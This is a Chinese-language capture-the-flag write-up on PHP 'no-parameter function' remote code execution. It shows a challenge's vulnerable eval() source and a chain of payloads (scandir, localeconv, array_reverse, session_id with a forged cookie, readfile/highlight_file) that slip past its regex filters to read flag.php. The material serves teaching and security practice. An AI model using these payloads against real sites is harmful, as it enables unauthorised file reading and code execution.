0x00 知識點
無參數RCE
eval($_GET['exp']);
參考鏈接:
https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#什么是無參數函數RCE
1.利用超全局變量進行bypass,進行RCE
2.進行任意文件讀取
形式:
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}
也就是說
正則匹配了一些關鍵字比如et導致很多函數不能用,getshell什么的基本不可能。
該正則,正是我們說的無參數函數的校驗,其只允許執行如下格式函數
a(b(c()));
a();
但不允許
a('123');
0x01解題
打開題目啥也沒有,啥都試試吧。。
這里如果你掃描目錄工具最夠強大可以掃出來/.git
得到源碼:
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("還差一點哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("還想讀flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
分析源碼:
1.需要以GET形式傳入一個名為exp的參數。如果滿足條件會執行這個exp參數的內容。
2.過濾了常用的幾個偽協議,不能以偽協議讀取文件。
3.(?R)引用當前表達式,后面加了?遞歸調用。只能匹配通過無參數的函數。
4.正則匹配掉了et/na/info等關鍵字,很多函數都用不了。
5:eval($_GET['exp']); 典型的無參數RCE
既然getshell基本不可能,那么考慮讀源碼
看源碼,flag應該就在flag.php
我們想辦法讀取
首先需要得到當前目錄下的文件
scandir()函數可以掃描當前目錄下的文件,例如:
<?php
print_r(scandir('.'));
?>
那么問題就是如何構造
scandir('.')
這里再看函數:
localeconv() 函數返回一包含本地數字及貨幣格式信息的數組。而數組第一項就是.
current() 返回數組中的當前單元, 默認取第一個值。
pos() current() 的別名。
這里還有一個知識點:
current(localeconv())永遠都是個點
那么我們第一步就解決了:
print_r(scandir(current(localeconv())));
print_r(scandir(pos(localeconv())));
現在的問題就是怎么讀取倒數第二個數組呢?
看手冊:
很明顯,我們不能直接得到倒數第二組中的內容:
三種方法:
1.array_reverse()
以相反的元素順序返回數組
?exp=print_r(array_reverse(scandir(current(localeconv()))));
2.array_rand(array_flip())
array_flip()交換數組的鍵和值
?exp=print_r(array_flip(scandir(current(localeconv()))));
array_rand()從數組中隨機取出一個或多個單元,不斷刷新訪問就會不斷隨機返回,本題目中scandir()返回的數組只有5個元素,刷新幾次就能刷出來flag.php
?exp=print_r(array_rand(array_flip(scandir(current(localeconv())))));
3.session_id(session_start())
本題目雖然ban了hex關鍵字,導致hex2bin()被禁用,但是我們可以並不依賴於十六進制轉ASCII的方式,因為flag.php這些字符是PHPSESSID本身就支持的。
使用session之前需要通過session_start()告訴PHP使用session,php默認是不主動使用session的。
session_id()可以獲取到當前的session id。
因此我們手動設置名為PHPSESSID的cookie,並設置值為flag.php
那么我們最后一個問題:
如何讀flag.php的源碼
因為et被ban了,所以不能使用file_get_contents(),但是可以可以使用readfile()或highlight_file()以及其別名函數show_source()
view-source:http://172.21.4.12:10031/?exp=print_r(readfile(next(array_reverse(scandir(pos(localeconv()))))));
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
?exp=show_source(session_id(session_start()));
得到flag
參考鏈接:
https://www.gem-love.com/websecurity/530.html?replytocom=5
https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#法四:session-id
https://shawroot.hatenablog.com/entry/2020/01/01/GXYCTF2019/BUUCTF-WEB%3A禁止套娃